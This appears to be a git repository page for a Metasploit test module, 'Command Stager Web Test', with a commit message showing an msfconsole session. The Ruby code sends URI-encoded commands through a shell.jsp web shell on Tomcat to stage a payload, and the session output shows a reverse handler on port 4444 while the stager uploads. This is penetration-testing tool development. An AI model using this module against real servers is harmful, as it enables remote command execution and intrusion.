adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c86d16ffb6048145dfcbbc40e8e68441fa0f76d3
metasploit-gs/test/modules/exploits/test/cmdweb.rb
T
Brent Cook 8b3a0a0bb1 really fix the cmdweb test 
this test to include the CmdStager module, not the CmdStagerVbs class

Before:
```
msf > loadpath test/modules
Loaded 32 modules:
    8 posts
    12 auxiliarys
    12 exploits
```

After:
```
msf > loadpath test/modules
Loaded 33 modules:
    8 posts
    12 auxiliarys
    13 exploits
msf > use exploit/test/cmdweb
msf exploit(cmdweb) > info

       Name: Command Stager Web Test
     Module: exploit/test/cmdweb
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Manual
  Disclosed: 2010-02-03

Provided by:
  bannedit <bannedit@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic Targeting

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                     yes       The target address
  RPORT    8080             yes       The target port
  VHOST                     no        HTTP server virtual host

Payload information:

Description:
  This module tests the command stager mixin against a shell.jsp
  application installed on an Apache Tomcat server.

msf exploit(cmdweb) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(cmdweb) > run

[*] Started reverse handler on 127.0.0.1:4444
[*] Command Stager progress -   2.01% done (2046/101881 bytes)
[*] Command Stager progress -   4.02% done (4092/101881 bytes)
[*] Command Stager progress -   6.02% done (6138/101881 bytes)
[*] Command Stager progress -   8.03% done (8184/101881 bytes)
[*] Command Stager progress -  10.04% done (10230/101881 bytes)
[*] Command Stager progress -  12.05% done (12276/101881 bytes)
[*] Command Stager progress -  14.06% done (14322/101881 bytes)
[*] Command Stager progress -  16.07% done (16368/101881 bytes)
[*] Command Stager progress -  18.07% done (18414/101881 bytes)
...
```
2015-01-27 11:44:34 -06:00

80 lines
1.6 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
# =( need more targets and perhaps more OS specific return values OS specific would be preferred
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Command Stager Web Test',
'Description' => %q{
This module tests the command stager mixin against a shell.jsp application installed
on an Apache Tomcat server.
},
'Author' => 'bannedit',
'References' =>
[
],
'DefaultOptions' =>
{
},
'Payload' =>
{
},
'Platform' => 'win',
'Privileged' => true,
'Targets' =>
[
# need more but this will likely cover most cases
[ 'Automatic Targeting',
{
'auto' => true
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 03 2010'))
register_options(
[
Opt::RPORT(8080),
], self.class)
end
def autofilter
false
end
# This is method required for the CmdStager to work...
def execute_command(cmd, opts)
uri = opts[:uri]
http_hash = {
'uri' => uri.gsub(/CMDS/, Rex::Text.uri_encode(cmd))
}
resp = send_request_raw(http_hash, 5)
end
def exploit
opts = {
:delay => 0.5,
:uri => "/shell/shell.jsp?cmd=CMDS"
}
execute_cmdstager(opts)
handler
end
end
Reference in New Issue View Git Blame Copy Permalink